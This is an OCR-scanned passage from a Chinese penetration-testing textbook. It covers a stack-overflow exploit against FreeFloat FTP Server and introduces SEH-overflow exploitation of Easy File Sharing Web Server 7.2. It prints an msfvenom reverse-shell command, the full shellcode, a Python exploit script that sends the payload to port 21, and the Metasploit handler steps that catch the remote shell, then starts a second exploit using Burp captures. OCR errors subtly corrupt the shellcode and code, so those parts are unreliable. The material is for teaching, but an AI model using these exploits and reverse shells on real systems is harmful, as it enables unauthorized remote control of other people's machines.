标 计算 机 上 的 ， 这 个 程序 的 功能 听 起 来 和 木马 很 像 ， 实 际 上 也 是 如 此 。 另 外 ， 实 际 上 要 在 渗 
透漏 洞 代码 中 替换 的 Shellcode 部 分 就 是 这 个 远程 控制 程序 的 被 控 端 的 代码 。 现 在 先 来 学 习 
一 下 如 何 生成 被 控 端 (这 个 被 控 端 既 可 以 是 一 段 代 码 ， 也 可 以 是 一 个 直接 执行 的 程序 )。 

在 Kali Linux 2 中 提供 了 多 个 可 以 用 来 产生 远程 控制 被 控 端 程序 的 方式 ， 但 是 其 中 最 为 
简单 强大 的 方法 应 该 要 数 msfvenom 命令 了 。 这 个 命令 是 著名 渗透 测试 软件 Metasploit 的 一 
个 功能 ， 但 是 可 以 直接 在 Kali Linux 2 中 使 用 这 个 命令 。 

以 前 旧版 本 的 Metasploit 中 提供 了 两 条 关于 远程 控制 被 控 端 程序 的 命令 ， 其 中 ，msfpay- 
load 负责 用 来 生成 攻击 载荷 ，msfencode 负责 对 攻击 载荷 进行 编码 。 新 版 本 的 Metasploit 中 将 
这 两 条 命令 整合 成 为 msfvenom 命令 ， 下 面 给 出 了 msfvenom 的 几 个 常见 的 使 用 参数 。 

Options: 

-p, --payload <payload> 指定 要 生成 的 payload (攻击 荷载 ) 。 如 果 需 要 使 用 自 定义 的 pay- 


load， 请 使 用 '-' 或 者 stdin 指定 
-f, --format <format> 指定 输出 格式 (可 以 使 用 --help-formats 来 获取 msf 支持 的 输出 


格式 列表 ) 
-b 避免 使 用 的 字符 
-e 编码 的 格式 
=o, =t <path> 指定 存储 payload 的 位 置 
--payload-options 列举 payload 的 标准 选项 
--help-formats 查看 msf 支持 的 输出 格式 列表 


首先 使 用 msfvenom 命令 来 创建 一 个 可 以 使 用 的 Shellcode。 


msfvenom -p windows/shell reverse tcp LHOST=192.168.1.104 LPORT=443 -b '\x00\ 
x0a\x40' -f c 
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生成 的 Shellcode 代码 如 下 所 示 。 


"\xba\x3d\x25\x0f\xda\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xbl" 
"\x52\x31\x56\x12\x83\xc6\x04\x03\x6b\x2b\xed\x2f\x6f\xdb\x73" 
"\xcf\x8f\xlc\x14\x59\x6a\x2d\x14\x3d\xff\xle\xa4\x35\xad\x92" 
"\x4f\xlb\x45\x20\x3d\xb4\x6a\x81\x88\xe2\x45\x12\xa0\xd7\xc4" 
"\x90\xbb\x0b\x26\xa8\x73\x5e\x27\xed\x6e\x93\x75\xa6\xe5\x06" 
"\x69\xc3\xb0\x9a\x02\x9f\x55\x9b\xf7\x68\x57\x8a\xa6\xe3\x0e" 
"\x0c\x49\x27\x3b\x05\x51\x24\x06\xdf\xea\x9e\xfc\xde\x3a\xef" 
"\xfd\x4d\x03\xdf\x0f\x8f\x44\xd8\xef\xfa\xbc\xla\x8d\xfc\x7b" 
"\x60\x49\x88\x9f\xc2\xla\x2a\x7b\xf2\xcf\xad\x08\xf8\xa4\xba" 
"\x56\x1d\x3a\x6e\xed\x19\xb7\x91\x21\xa8\x83\xb5\xe5\xf0\x50" 
"\xd7\xbc\x5c\x36\xe8\xde\x3e\xe7\x4c\x95\xd3\xfc\xfc\xf4\xbb" 
"\x31\xcd\x06\x3c\x5e\x46\x75\x0e\xc1\xfc\x11\x22\x8a\xda\xe6" 
"\x45\xa1\x9b\x78\xb8\x4a\xdc\x51\x7f\xle\x8c\xc9\x56\x1f\x47" 
"\x09\x56\xca\xc8\x59\xf8\xa5\xa8\x09\xb8\x15\x41\x43\x37\x49" 
"\x71\x6c\x9d\xe2\x18\x97\x76\xcd\x75\x96\xee\xa5\x87\x98\xef" 
"\x8e\x01\x7e\x85\xe0\x47\x29\x32\x98\xcd\xal1\xa3\x65\xd8\xcc" 
"\xe4\xee\xef\x31\xaa\x06\x85\x21\x5b\xe7\xd0\xlb\xca\xf8\xce" 
"\x33\x90 \x6b\x95\xc3\xdf\x97\x02\x94\x88\x66\x5b\x70\x25\xd0" 
"\xf5\x66\xb4\x84\x3e\x22\x63\x75\xc0\xab\xe6\xcl\xe6\xbb\x3e" 
"\xc9\xa2\xef\xee\x9c\x7c\x59\x49\x77\xcf\x33\x03\x24\x99\xd3" 
"\xd2\x06\xla\xa5\xda\x42\xec\x49\x6a\x3b\xa9\x76\x43\xab\x3d" 
"\xOf\xb9\x4b\xcl\xda\x79\x7b\x88\x46\x2b\x14\x55\x13\x69\x79" 
"\x66\xce\xae\x84\xe5\xfa\x4e\x73\xf5\x8f\x4b\x3f\xbl\x7c\x26" 
"\x50\x54\x82\x95\x51\x7d"; 


可 以 将 这 段 代码 的 功能 理解 为 一 个 木马 ， 这 个 木马 一 旦 在 目标 上 运行 ， 就 会 在 目标 主机 
上 打开 一 个 端口 ， 然 后 被 控制 。 修 改 之 后 的 代码 如 下 所 示 。 


import socket 

buff = "\x41"*230+"\xD7\x30\x9D\x7C"+"\x90"*20 
shellcode="\xba\x3d\x25\x0f\xda\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" 
shellcode+="\x52\x31\x56\x12\x83\xc6\x04\x03\x6b\x2b\xed\x2f\x6f\xdb\x73" 
shellcode+="\xcf\x8f\x1c\x14\x59\x6a\x2d\x14\x3d\xff\xle\xa4\x35\xad\x92" 
shellcode+="\x4f\x1b\x45\x20\x3d\xb4\x6a\x81\x88\xe2\x45\x12\xa0\xd7\xc4" 
shellcode+="\x90\xbb\x0b\x26\xa8\x73\x5e\x27\xed\x6e\x93\x75\xa6\xe5\x06" 
shellcode+="\x69\xc3\xb0\x9a\x02\x9f\x55\x9b\xf7\x68\x57\x8a\xa6\xe3\x0e" 
shellcode+="\x0c\x49\x27\x3b\x05\x51\x24\x06\xdf\xea\x9e\xfc\xde\x3a\xef" 
shellcode+="\xfd\x4d\x03\xdf\x0f\x8f\x44\xd8\xef\xfa\xbc\xla\x8d\xfc\x7b" 
shellcode+="\x60\x49\x88\x9f\xc2\xla\x2a\x7b\xf2\xcf\xad\x08\xf8\xa4\xba" 
shellcode+="\x56\x1d\x3a\x6e\xed\x19\xb7\x91\x21\xa8\x83\xb5\xe5\xf0\x50" 
shellcode+="\xd7\xbc\x5c\x36\xe8\xde\x3e\xe7\x4c\x95\xd3\xfc\xfc\xf4\xbb" 
shellcode+="\x31\xcd\x06\x3c\x5e\x46\x75\x0e\xcl1\xfc\x11\x22\x8a\xda\xe6" 
shellcode+="\x45\xal1\x9b\x78\xb8\x4a\xdc\x51\x7f\xle\x8c\xc9\x56\x1f\x47" 
shellcode+="\x09\x56\xca\xc8\x59\xf8\xa5\xa8\x09\xb8\x15\x41\x43\x37\x49" 
shellcode+="\x71\x6c\x9d\xe2\x18\x97\x76\xcd\x75\x96\xee\xa5\x87\x98\xef" 
shellcode+="\x8e\x01\x7e\x85\xe0\x47\x29\x32\x98\xcd\xa1\xa3\x65\xd8\xcc" 
shellcode+="\xe4\xee\xef\x31\xaa\x06\x85\x21\x5b\xe7\xd0\xlb\xca\xf8\xce" 
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shellcode+="\x33\x90\x6b\x95\xc3\xdf\x97\x02\x94\x88\x66\x5b\x70\x25\xd0" 
shellcode+="\xf5\x66\xb4\x84\x3e\x22\x63\x75\xc0\xab\xe6\xcl\xe6\xbb\x3e" 
xc9\xa2\xef\xee\x9c\x7c\x59\x49\x77\xcf\x33\x03\x24\x99\xqd3" 
shellcode+="\xd2\x06\xla\xa5\xda\x42\xec\x49\x6a\x3b\xa9\x76\x43\xab\x3d" 
shellcode+="\x0f\xb9\x4b\xcl\xda\x79\x7b\x88\x46\x2b\x14\x55\x13\x69\x79" 
shellcode+="\x66\xce\xae\x84\xe5\xfa\x4e\x73\xf5\x8f\x4b\x3f\xbl\x7c\x26" 
shellcode+="\x50\x54\x82\x95\x51\x7d" 

buff+=shellcode 

target = "192.168.1.106" 

s=socket.socket (socket .REF INET, socket .SOCK STREAM) 

s.connect( (target, 21)) 

s.send("USER "+buff+"\r\n") 

s.close () 


现在 启动 Metasploit， 这 是 因为 需要 一 个 主 控 端 : 
root@kali: ~ # msfconsole 
启动 了 Metasploit 之 后 : 


msf > use exploit/multi/handler 

msf exploit (handler) > set payload windows/shell reverse tcp 
msf exploit (handler) > set lhost 192.168.1.104 

msf exploit (handler) > set lport 443 

msf exploit (handler) > exploit 


执行 的 结果 如 图 6-31 所 示 


e exploit/multi/handler 
exploit( ] d windol l_reverse tcp 
windows/sh rse tcp 
) > set lhost 192.168.1.104 
168.1.104 


msf exploit( ) > set lport 443 
Lport 443 
exploit( > exploit 


s ted re CP ha on 192.168.1.104:443 


图 6-31 Xf handler 进行 设置 


然后 执行 渗透 脚本 ， 执 行 之 后 可 以 看 到 Metasploit 的 客户 端 中 有 如 图 6-32 所 示 显 示 。 


8.1.106:1266) at 


(C) Copyright 198 


[C:\Documents and Settings\Admin: 


图 6-32 成 功 建立 远程 控制 连接 
好 了 ， 现 在 就 使 用 编写 的 程序 来 远程 控制 目标 计算 机 。 
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小 结 


在 本 章 中 针对 一 个 特定 漏洞 进行 渗透 模块 开发 ， 这 是 一 个 存在 于 FreeFloat FTP Server 软 
件 上 的 栈 溢 出 类 型 漏洞 。 这 种 漏洞 极为 普遍 ， 因 而 对 这 种 漏洞 的 研究 可 以 提高 渗透 测试 方面 
的 能 力 。 

在 本 章 开 始 的 时 候 首 先 介绍 了 如 何 来 引起 一 个 程序 的 崩溃 ， 利 用 崩溃 的 信息 可 以 找 出 该 
程序 的 偏 移 地 址 。 然 后 讲解 了 如 何 利用 这 个 地 址 来 编写 一 个 渗透 开发 模块 ， 这 里 涉及 如 何 查 
Jë “JMP ESP” 指 令 ， 如 何 编写 渗透 程序 ， 如 何 找到 引起 程序 终止 的 坏 字 符 等 知识 点 。 最 后 
使 用 Metasploit 生成 了 Shellcode， 并 将 这 个 Shellcode 加 入 渗透 模块 。 


a» 07 
对 漏洞 进行 渗透 ( 高 级 部 分 ) 


在 第 6 章 中 讲解 了 如 何 针对 一 个 软件 来 编写 它 的 渗透 模块 ， 这 个 编写 的 过 程 并 不 复杂 ， 
主要 是 找到 一 个 地 址 固定 的 “JMP ESP” 指 令 。 另 外 还 介绍 了 一 些 有 用 的 技能 ， 包 括 如何 找 
到 改写 EIP 内 容 的 地 址 ， 如 何 使 用 NOP 指令 来 进行 填充 ， 如 何 确定 坏 字 符 等 。 

随 着 Windows 操作 系统 安全 性 的 不 断 提高 ， 这 种 简单 利用 “JMP ESP” 指 令 去 执行 数据 
区 域 代码 的 方法 已 经 很 难 实现 ， 不 过 很 快 就 有 人 发 现 了 一 个 新 的 途径 ， 那 就 是 Windows 下 的 
结构 化 异常 处 理 ( SEH) 机 制 。 有 过 编程 经 验 的 读者 一 定 会 对 try/except 或 者 try/catch 这 种 结 
构 不 陌生 ， 其 实 这 就 是 结构 化 异常 处 理 。 

try: 

// 要 执行 的 代码 


except: 


// 异常 处 理 代码 

这 种 格式 书写 的 代码 表示 ,try 中 的 代码 会 执行 ， 但 是 如 果 在 执行 过 程 中 发 生 了 异常 ， 就 
会 执行 except 中 的 代码 ， 也 就 是 异常 处 理 。 

在 本 章 中 将 会 学 习 如 何 利 用 结构 化 异常 处 理 (SEH) 机 制 来 完成 渗透 模块 的 编写 。 本 章 
的 内 容 将 围绕 如 下 主题 展开 。 

(1) SEH 溢出 的 原理 。 

(2) 编写 基于 SEH 溢出 渗透 模块 的 要 点 。 

(3 ) 使 用 Python 编写 渗透 模块 。 

(4) 移植 Metasploit 中 的 渗透 模块 。 
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7.1 SEH 溢出 简介 


大 多 数 人 都 认为 程序 员 是 一 份 高 智商 的 工作 ， 甚 至 很 多 程序 员 也 都 这 样 认为 。 所 以 经 常 
有 程序 员 说 :“ 程 序 可 能 会 出 现 错误 ,但 那 是 别人 造成 的 ， 与 我 无 关 。” 但 是 事实 却 未 必 如 此 ， 
在 编写 程序 时 ， 任 何人 都 可 能 出 现 错误 。 但 是 仅 依靠 人 工 检查 就 想 去 除 所 有 的 错误 ， 这 是 不 
可 能 的 。 

常见 的 错误 有 很 多 种 ， 例 如 ， 在 进行 除法 的 时 候 ， 如 果 使 用 0 作为 除数 ， 就 会 出 现 异 
常 。 当 异常 出 现 的 时 候 ， 就 是 异常 处 理 程序 起 作用 的 时 候 ， 如 图 7-1 所 示 。 


的 FTPServer.exe 已 停止 工作 
x 
Windows 可 以 联机 检查 该 问题 的 解决 方案 。 


> 联机 检查 解决 方案 并 关闭 该 程序 


APPCRASH 
FTPServer exe 


图 7-1 异常 出 现 


异常 处 理 程序 是 用 来 捕获 在 程序 执行 期 间 生 成 的 异常 和 错误 的 代码 模块 ， 这 种 机 制 可 以 
保证 程序 继续 执行 而 不 崩溃 。Windows 操作 系统 中 也 有 默认 的 异常 处 理 程序 ， 在 一 个 应 用 程 
序 崩 溃 的 时 候 ， 一 般 会 看 到 系统 弹出 一 个 “程序 遇 到 错误 ， 需 要 关闭 ”的 窗口 。 当 程序 产生 
了 异常 之 后 ， 就 会 从 栈 中 加 载 catch 代码 的 地 址 并 调用 catch 代码 。 因 此 ， 如 果 以 某 种 方式 设 
法 覆盖 了 栈 中 异常 处 理 程序 的 catch 代码 地 址 ， 就 能 够 控制 这 个 应 用 程序 。 接 着 来 看 一 个 使 
用 了 异常 处 理 程序 的 应 用 程序 在 栈 中 是 如 何 安排 其 内 容 的 。 图 7-2 中 给 出 了 如 果 向 程序 提供 
了 大 量 的 A 从 而 导致 溢出 之 后 内 存 的 分 布 。 

相 比 第 6 章 的 例子 中 的 程序 ， 使 用 了 异常 处 理 的 程序 要 多 了 一 部 分 内 容 。 这 个 内 容 就 是 
异常 处 理 程序 的 地 址 。 因 为 新 型 操作 系统 安全 性 较 强 ， 可 以 执行 的 代码 和 不 可 以 执行 的 数据 
是 分 开 的 ， 虽 然 仍 然 可 以 像 前 面 程 序 中 将 Shellcode 放置 在 数据 区 域 中 ， 但 是 这 个 Shellcode 
是 无 法 执行 的 。 不 过 可 以 看 到 异常 处 理 程序 的 地 址 仍然 在 可 以 执行 的 代码 区 域 ， 现 在 就 可 以 
利用 这 个 地 址 来 执行 Shellcode。 
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Ox00000000 


存储 变量 的 空间 


异常 处 理 程序 的 地 址 
更 多 数据 


OxFFFFFFFF OxFFFFFFFF 
图 7-2 程序 发 生 溢 出 之 后 的 内 存 分 布 
由 于 往往 有 很 多 种 异常 ， 所 以 异常 处 理 程序 也 不 是 一 个 简单 的 结构 ， 而 是 一 个 异常 处 理 
链 ， 当 捕获 了 异常 之 后 ， 会 将 异常 交 给 SEH 链 ， 如 果 当 前 的 处 理 程序 无 法 处 理 这 个 异常 ， 就 
会 交 给 下 一 个 异常 处 理 程序 ， 这 个 SEH 链 的 结构 如 图 7-3 所 示 。 


0x00000000 


TRY 模块 


catch 块 地 址 


catch 块 地 址 


catch 块 地 址 


区 


OxFFFFFFFF 
图 7-3 SEH 链 的 结构 
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图 7-3 中 ,每 一 条 SEH 记 录 都 是 由 8 个 字 节 所 组 成 ， 其中， 前 4 个 字 节 是 它 后 面 的 
SEH 异常 处 理 程序 的 地 址 ， 后 4 个 字 节 是 catch 块 的 地 址 。 一 个 应 用 程序 可 能 有 多 个 异常 处 
理 程序 ， 因 此 一 个 SEH 记录 将 前 4 个 字 节 用 来 保存 下 一 条 SEH 记录 的 地 址 。 

可 以 利用 这 个 SEH 记录 来 实现 对 程序 的 溢出 渗透 。 下 面 给 出 了 基于 SEH 溢出 进行 渗透 
的 思路 。 

(1) 引起 应 用 程序 的 异常 ， 这 样 才 可 以 调用 异常 处 理 程序 。 

(2 ) 使 用 一 条 POP/POP/RET 指令 的 地 址 来 改写 异常 处 理 程序 的 地 址 ， 因 为 需要 将 执行 
切换 到 下 一 条 SEH 记录 的 地 址 (catch 异常 处 理 程序 地 址 前 面 的 4 个 字 节 )。 之 所 以 使 用 POP/ 
POP/RET， 是 因为 用 来 调用 catch 块 的 内 存 地 址 保存 在 栈 中 ， 指 向 下 一 个 异常 处 理 程序 指针 
的 地 址 就 是 ESP+8 ( ESP 是 栈 顶 指针 )。 因 此 ， 两 个 POP 操作 就 可 以 将 执行 重 定向 到 下 一 条 
SEH 记录 的 地 址 。 

(3) 在 第 一 步 输入 数据 的 时 候 , 已 经 将 下 一 条 SEH 记录 的 地 址 蔡 换 成 了 跳 转 到 攻击 载荷 的 
JMP 指令 的 地 址 。 因 此 ， 当 第 二 个 步骤 结束 时 ， 程 序 就 会 跳 过 指定 数量 的 字 节 去 执行 Shellcode。 

(4) 当成 功 跳 转 到 Shellcode 之 后 ， 攻 击 载荷 就 会 执行 ， 也 获得 了 目标 系统 的 管理 权限 。 

如 图 7-4 所 示 ， 当 一 个 异常 发 生 时 ， 异 常 处 理 程序 的 地 址 (已 经 使 用 POP/POP/RET 指令 
的 地 址 改写 过 ) 就 会 被 调用 。 这 会 导致 POP/POP/RET 的 执行 ， 并 将 执行 的 流程 重新 定向 到 
下 一 条 SEH 记录 的 地 址 (已 经 使 用 一 个 短 跳 转 指令 改写 过 )。 因 此 当 JMP 指令 执行 的 时 候 ， 
它 会 指向 Shellcode; 而 在 应 用 程序 看 来 ， 这 个 Shellcode 只 是 另 一 条 SEH 记录 。 

4. 下 一 跳 SEH 记 录 的 地 址 中 


包含 了 一 条 到 攻击 载荷 的 
1 .异常 发 生 短 跳 转 指 令 


下 一 条 SEH 记 录 的 地 址 


2.handler 的 地 址 被 改写 为 
PoP/POP/RET 的 地 址 


调用 catch 块 ShellCode 


3.POP/POP/RET 的 操作 
可 以 将 执行 重 定向 到 
下 一 跳 SEH 记 录 的 地 址 


POP/POP/RET 


图 7-4 SEH 记录 调用 的 过 程 


72 ”编写 基于 SEH 溢出 渗透 模块 的 要 点 


现在 已 经 了解 了 SEH 溢出 的 原理 ， 下 面 总 结 一 下 编写 渗透 模块 的 要 点 。 
(1) 到 catch 位 置 的 偏 移 量 。 
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(2 ) POP/POP/RET 地 址 。 

(3 ) 短 跳 转 指令 。 

在 这 次 实验 中 使 用 了 两 个 虚拟 机 ， 一 个 是 Kali Linux 2 作为 Python 编程 环境 ， 另 一 个 是 
Windows 7， 上 面 运行 着 Easy File Sharing Web Server 7.2, IP 地 址 为 192.168.169.133 ， 这 个 


软件 可 以 在 https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fbal30ea481f31-efssetup.exe 处 
下 载 ， 如 图 7-5 所 示 。 


图 7-5 实验 中 需要 的 虚拟 机 


7.2.1 计算 到 catch 位 置 的 偏 移 量 


现在 要 处 理 的 这 个 有 漏洞 的 应 用 程序 是 Easy File Sharing Web Server 7.2， 这 个 Web 应 用 
程序 运行 时 的 界面 如 图 7-6 所 示 


ej 


Stop SSL | About 


http://192. 168. 169.133 


saport 443 Restar 
SSLURL: https://192. 168. 169.133 


Launch Web Server at windows startup 
E Startup minimized in systemtray 

[7] Automaticaly activate server at startup 
F7] Automaticaly activate ssl server at startup 


[Web Server is online] / [SSL Server is online] 


图 7-6 Easy File Sharing Web Server 7.2 
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Easy File Sharing Web Server 7.2 在 处 理 请 求 时 存在 漏洞 一 个 恶意 的 请 求 头 部 就 可 以 
引起 缓冲 区 溢出 ， 从 而 改写 SEH 链 的 地 址 。 图 7-7 给 出 了 访问 这 个 服务 器 的 页 面 。 


r 


Login - powered by Easy File Sharing Web Server - Mozilla Firefox © © © 


j Login - powered by Easy ... x + 


(€) © 192.168.169.133 © | [2 Search wa > = 
B Most Visited» Offensive Security '& Kali Linux '&, Kali Docs '& Kali Tools RExploit-DB >» 


Please enter your username and password to login 


$ User Login 


Note: Usemame and Password are case sensitive. 


Username: 1 want to regester 
Password: 1 torgot my password 
Login! | C Remember me 


ban as a guest | secure bogin 


MERCAR q 


图 7-7 使 用 浏览 器 访问 这 个 服务 器 的 页 面 


首先 编写 一 个 简单 连接 到 Easy File Sharing Web Server 7.2 的 程序 。 注 意 ， 不 要 试图 在 登 
录 页 面 的 Username 处 填写 过 多 的 字符 ， 页 面 的 文本 框 输入 有 长 度 限 制 。 因 此 ， 与 第 6 章 做 
的 一 样 ， 先 来 编写 一 段 登录 代码 。 


import sys, socket 

if len(sys.argv) != 2: 
print "Usage: SEHattack <IP>Nn eg: SEHattack 192.168.1.1" 
sys.exit(1) 

host=sys.argv[1] 

port=80 

packet="" # 这 是 向 简单 文件 分 享 Web 服务 器 7.2 发 送 的 数据 包 

s = socket.socket (socket.AF_INET, socket.SOCK STREAM) 

.Connect ( (host, port)) 

. send (packet) 

.close() 


基本 上 所 有 的 Web 程序 所 使 用 的 登录 程序 都 可 以 使 用 如 上 所 示 的 代码 ， 区 别 在 于 向 目标 
所 发 送 的 数据 包 (就 是 上 面 代码 中 的 packet) 的 不 同 ， 这 里 需要 使 用 一 个 抓 包 软件 来 捕获 一 
次 登录 数据 包 的 内 容 ， 然 后 对 其 进行 修改 。 

不 过 这 一 次 不 使 用 WireShark， 而 是 使 用 另 一 个 专门 针对 Web 程序 的 工具 Burp Suite, 
这 个 工具 有 很 多 实用 的 功能 。 


uuu 
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Burp Suite 的 作用 就 相当 于 在 浏览 器 和 目标 服务 器 中 间 的 一 个 中 转 站 ， 它 可 以 将 两 者 通 
信 的 数据 包 截 获 下 来 ， 从 而 查看 和 修改 其 中 的 内 容 。 

可 以 使 用 浏览 器 发 送 一 个 用 户 名 为 123 的 登录 过 程 ， 然 后 再 用 Burp Suite 捕获 这 个 数据 
4, 将 123 替换 为 上 例 中 的 payload 中 的 字符 即 可 。 

首先 在 Kali Linux 2 中 启动 Firefox( 也 是 火狐 浏览 器 )， 然 后 打开 设置 选项 ， 如 图 7-8 所 示 。 

然后 依次 选择 Advanced 一 Network 一 Settings…， 如 图 7-9 所 示 。 


i x|* 
cjssem č we > m 
X Ot [Ñ Coy G Paste 

= | 100% E 
O œ% BR 
New Window New Private Save Page 
Window 
= © 2 
Prnt Histoy Fult Sereen 
2 [2] 2 
Fnd Add-ons 

pe a 
Developer Synced Tabs 


图 7-8 打开 设置 选项 


(€ OF re aboutpreferencestadvanced 


E MostVistedy POfensive Securty N Kali Linux `S Kal Docs NKal Tools EHExploit-DB Aircrack-ng 


a Advanced 
Q 
General Data Choices Network Update Certificates 
A Connection 
Configure how Firsfox connects to the Intemet 
a Cached Web Content 
Your web content cache Is currently using 28.0 MB of disk space Clear Now 


° 


Override automatic cache management 
tcacheto 3 MB of space 


e 


图 7-9 选择 Advanced 一 Network 一 Settings… 


在 最 后 的 连接 设置 中 ， 选 择 使 用 人 工 代 理 设置 将 其 设置 为 127.0.0.1， 端 口 设置 为 


8080， 如 图 7-10 所 示 。 


Connection Settings ° 


Configure Proxies to Access the Internet 

O No proxy 

C Auto-detect proxy settings for this network 
Us mpos 


SSL Proxy: | 127001 


ETP Proxy: [1272001 


SOCKS Host: [127.001 
SOCKS v4 - SOCKS ys D Remote DNS 
No Proxy for: 
localhost, 127.0.0.1 


Example: mozilla.org, net.nz, 192.168.1.0/24 
C Automatic proxy configuration URL: 


| ] [ Reia | 
DO Do not prompt for authentication if password is saved 
Help aea | [ ox | 
图 7-10 设置 代理 的 他 地 址 和 端口 
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接 下 来 在 浏览 器 中 输入 如 图 7-11 所 示 的 地 址 ， 然 后 访问 。 
Burp Suite Free Edition - Mozilla Firefox 
x \ $ Preferences x + 


Burp Suite Free Edition 
(ef © 192.168.169.133/1orum.ghp © Da Search 


M Most Visited v IB]Offensive Security Kali Linux ‘Ñ Kali Docs "Ñ Kali Tools [BExploit-DB 
图 7-11 在 浏览 器 中 访问 目标 服务 器 


时 切换 到 Burp Suite， 依 次 选择 Proxy 一 Intercept — Forward， 如 图 7-12 所 示 。 


| = 


Burp Intruder Repeater Window Help 


n E 


图 7-12 放行 数据 包 
这 样 做 的 目的 是 放行 发 往 目标 服务 器 的 数据 包 ， 这 样 请 求 才 会 到 达 


:目标 服务 器 ， 如 图 


7-13 所 示 。 


Login - powered by Easy File Sharing Web Server - Mozilla Firefox 


J Login - powered by Easy .. x ` #k Preferences x + 
e |[Q Search |t > = 


(4) © 192.168.169.133/login.htm 
u Most Visited v RBOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools [BExploit-DB 


Please enter your username and password to login 
$ User Login 


Note: Usemame and Password are case sensitive. 


» 


Username: [123 1 want to register 


Password: [ees `] ! forgot my password 


Login! | 口 Remember me 


ban as a guest | secure bogin 


Poweed by Easy Fe Shang Wb Sener 
Copt ©2012 EFS Sotas he 


图 7-13 Easy File Sharing Web Server 7.2 的 登录 界面 
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图 7-14 中 捕获 的 就 是 浏览 器 在 进行 登录 时 产生 的 数据 包 。 


69.133.80 


Request to http://192_ 


er) Com) D Co 


POST /forum. ghp HTTP/1.1 
Host: 192.168.169.133 
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US, en; qF0.5 

Referer: http: //192. 168. 169. 133/login. htm 

Cookie: SESSIONID=29055; UserID=123; PassWD=123; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201 
Connection: close 

Cache-Control: max-age=0 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 60 


frmLogiret rue&f rmUserName=1235f rmUserPass=1238logir=LogirN21| 


图 7-14 捕获 的 登录 数据 包 


这 个 数据 包 中 出 现 了 两 次 登录 信息 ， 一 次 是 Cookie 中 ,一 次 是 在 最 后 ， 选 择 在 Cookie 
中 填充 要 使 用 的 数据 即 可 。 使 用 这 个 数据 包 的 内 容 来 作为 packet 的 值 (直接 复制 里 面 的 内 容 
即 可 )， 修 改 之 后 的 程序 如 下 所 示 。 


packet= ( 

"POST /forum.ghp HTTP/1.1" 

"Host: 192.168.169.133" 

"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 
Firefox/45.0" 

"Accept: text/html,application/xhtml+xml, application/xml; q=0.9,*/*;q=0.8" 

"Accept-Language: en-US,en;q=0.5" 

"Referer: http://192.168.169.133/login.htm" 

"Cookie: SESSIONID=29055; UserID=" + craftedreq + "; PassWD=123; frmUserName=; 
frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201;\r\n" 

"Connection: close" 

"Cache-Control: max-age=0" 

"Content-Type: application/x-www-form-urlencoded" 


) 


这 段 代 码 的 作用 可 以 实现 对 Easy File Sharing Web Server 7.2 的 登录 。 接 下 来 测试 一 下 
Easy File Sharing Web Server 7.2 是 否 存在 溢出 的 漏洞 问题 ， 方 法 很 简单 ， 向 目标 程序 发 送 
一 个 足够 长 的 用 户 名 ， 查 看 目标 程序 的 反应 。 需 要 使 用 pattern_create 来 产生 一 个 10 000 个 
字符 。 


root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern create.rb -1 
10000 


执行 的 结果 如 图 7-15 所 示 。 
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root@ kal: /usrsnare/metaspiort-rramework/toots/exptoit ovo 


File Edt View Search Terminal Help 


图 7-15 产生 的 10 000 个 字符 


将 产生 的 10 000 个 字符 粘贴 到 程序 的 packet 处 ， 修 改 的 内 容 如 下 


import socket 

host="192.168.169.133"# 这 是 Easy File Sharing Web Server 7.2 所 在 主机 的 IP 地 址 

Port=80 

# 测试 用 的 10000 个 字符 过 长 ， 所 以 只 显示 了 其 中 的 一 部 分 。 

payload="Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8 
Ab9AcO0AclAc2Ac3Ac4Ac5Ac6Ac7Ac8Ac9AdO0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4 
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1lAg2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1 
Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0AilAi2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AjJ3Aj4AjJ5Aj6Aj7Aj8 
Aj9AkOAk1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9A10A11A12A13A14A15A16A17A18A19AmO0AmlAm2Am3Am4Am5 
Am6Am7Am8Am9An0AnlAn2An3An4An5An6An7An8An9Ao0AolAo2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Apl 
Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0AqlAq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7 
Ar8Ar9As0AslAs2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0AulAu2Au3Au4 
Au5SAu6Au7Au8SAuQ9AvO0AvlAv2Av3Av4Av5Av6Av7JAv8Av9Aw0Aw1lAw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1 
Ax. 1Mj2Mj3Mj 4Mj5 
Mj6Mj 7Mj 8Mj 9MkOMk 1Mk2Mk3Mk 4Mk5Mk 6Mk 7Mk8Mk9M10M11M12M13M14M15M16M1 7M18M1 9Mm0Mm1Mm2 
Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mnl1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3 
Mo4Mo5Mo6Mo 7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp 7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1 
